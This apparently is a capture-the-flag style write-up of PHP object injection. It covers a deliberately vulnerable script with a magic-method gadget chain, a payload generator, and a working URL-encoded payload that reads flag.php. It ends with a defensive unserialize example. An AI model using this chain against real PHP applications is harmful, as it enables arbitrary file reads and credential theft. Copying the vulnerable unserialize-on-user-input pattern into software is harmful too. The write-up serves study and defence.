
Exploiting PHP Magic Methods to Read Arbitrary Files via Unserialize

Tech | May 19
<?php
error_reporting(1);

// Sink: __invoke() is fired when an instance is called like a function
class Reader {
    public $file = 'index.php';
    public function fetch($path) {
        return base64_encode(file_get_contents($path));
    }
    public function __invoke() {
        echo $this->fetch($this->file);
    }
}

// Entry point: __wakeup() runs on every Display restored by unserialize()
class Display {
    public $src;
    public $cfg;
    public function __construct($name = 'index.php') {
        $this->src = $name;
        echo $this->src . " loaded<br>";
    }
    // Reached when a Display is coerced to string (e.g. by preg_match())
    public function __toString() {
        return $this->cfg['x']->src;
    }
    public function render() {
        if (preg_match('/gopher|http|ftp|https|dict|\.\.|flag|file/i', $this->src))
            die('blocked');
        highlight_file($this->src);
    }
    // The guard itself performs the string coercion that starts the chain
    public function __wakeup() {
        if (preg_match('/gopher|http|file|ftp|https|dict|\.\./i', $this->src)) {
            echo "blocked";
            $this->src = 'index.php';
        }
    }
}

// Pivot: __get() runs on access to an undefined property and calls $cb
class Proxy {
    public $cb;
    public function __construct() {
        $this->cb = [];
    }
    public function __get($k) {
        $fn = $this->cb;
        return $fn();
    }
}

if (isset($_GET['payload'])) {
    unserialize($_GET['payload']);   // attacker-controlled input, no class allow-list
} else {
    $d = new Display();
    $d->render();
}

Trigger Chain

  1. Display::__wakeup() is executed automatically after unserialize() restores the outer Display object.
  2. Inside __wakeup() the preg_match() call forces $this->src to be treated as a string, invoking __toString() when $this->src is itself a Display object (in the payload it is a reference back to the outer object).
  3. __toString() dereferences $this->cfg['x']->src; if $this->cfg['x'] is a Proxy instance, the non-existent property src triggers Proxy::__get().
  4. __get() copies $this->cb into $fn and calls $fn(); if $this->cb is a Reader object, PHP invokes Reader::__invoke().
  5. __invoke() finally calls Reader::fetch() with the attacker-controlled $file, leaking any local file in base64. The guard in __wakeup() only rewrites $this->src afterwards, so it never prevents the read.

Payload Generator

<?php
// Property-only stand-ins: no __wakeup/__toString here, so building the
// object graph locally has no side effects
class Reader { public $file = 'flag.php'; }
class Display { public $src; public $cfg; }
class Proxy { public $cb; }

$d = new Display();
$d->src = $d;                // self-reference (serialized as r:1); triggers __toString via preg_match
$d->cfg['x'] = new Proxy();  // __toString reads cfg['x']->src, an undefined property -> __get
$d->cfg['x']->cb = new Reader();  // __get calls cb() -> Reader::__invoke -> fetch('flag.php')

echo urlencode(serialize($d));

The resulting GET request:

/?payload=O%3A7%3A%22Display%22%3A2%3A%7Bs%3A3%3A%22src%22%3Br%3A1%3Bs%3A3%3A%22cfg%22%3Ba%3A1%3A%7Bs%3A1%3A%22x%22%3BO%3A5%3A%22Proxy%22%3A1%3A%7Bs%3A2%3A%22cb%22%3BO%3A6%3A%22Reader%22%3A1%3A%7Bs%3A4%3A%22file%22%3Bs%3A8%3A%22flag.php%22%3B%7D%7D%7D%7D

The base64-encoded content of flag.php is printed to the browser.
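For comparison, an added defensive example (my own code, not part of the original write-up): the challenge's Display guard is kept, but the payload is deserialized with allowed_classes => false, so no user class is instantiated and no magic method runs; the wrapper then rejects any result that still contains objects. The helper names safeUnserialize and containsObject and the constructed payload are assumptions.

```php
<?php
// Same guard as the challenge: coercing $this->src to string is what starts
// the chain when src is itself an object. With allowed_classes => false this
// method is never invoked, because no Display object is ever created.
class Display {
    public $src;
    public $cfg;
    public function __wakeup() {
        echo "wakeup fired\n";
        if (preg_match('/gopher|http|file|ftp|https|dict|\.\./i', $this->src)) {
            $this->src = 'index.php';
        }
    }
}

// Constructed payload: a Display whose src points back at itself (r:1),
// the same shape the write-up's generator produces.
$payload = 'O:7:"Display":1:{s:3:"src";r:1;}';

// Returns the decoded value for object-free data, null otherwise.
function safeUnserialize(string $data) {
    // allowed_classes => false turns every object token into
    // __PHP_Incomplete_Class, so __wakeup/__toString/__get/__invoke
    // from the payload's classes can never run.
    $value = @unserialize($data, ['allowed_classes' => false]);
    if ($value === false && $data !== 'b:0;') {
        return null;                        // malformed input
    }
    return containsObject($value) ? null : $value;
}

// Depth-limited walk: a serialized array may reference itself (R:),
// so unbounded recursion is not safe.
function containsObject($v, int $depth = 0): bool {
    if (is_object($v) || $depth > 32) {     // __PHP_Incomplete_Class counts
        return true;
    }
    if (is_array($v)) {
        foreach ($v as $item) {
            if (containsObject($item, $depth + 1)) {
                return true;
            }
        }
    }
    return false;
}

var_dump(safeUnserialize($payload));                 // NULL, "wakeup fired" never printed
var_dump(safeUnserialize('a:1:{s:1:"k";i:1;}'));    // plain array is accepted
```

Where objects genuinely need to round-trip, pass an explicit list of class names in allowed_classes instead of false, and prefer JSON for untrusted input.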
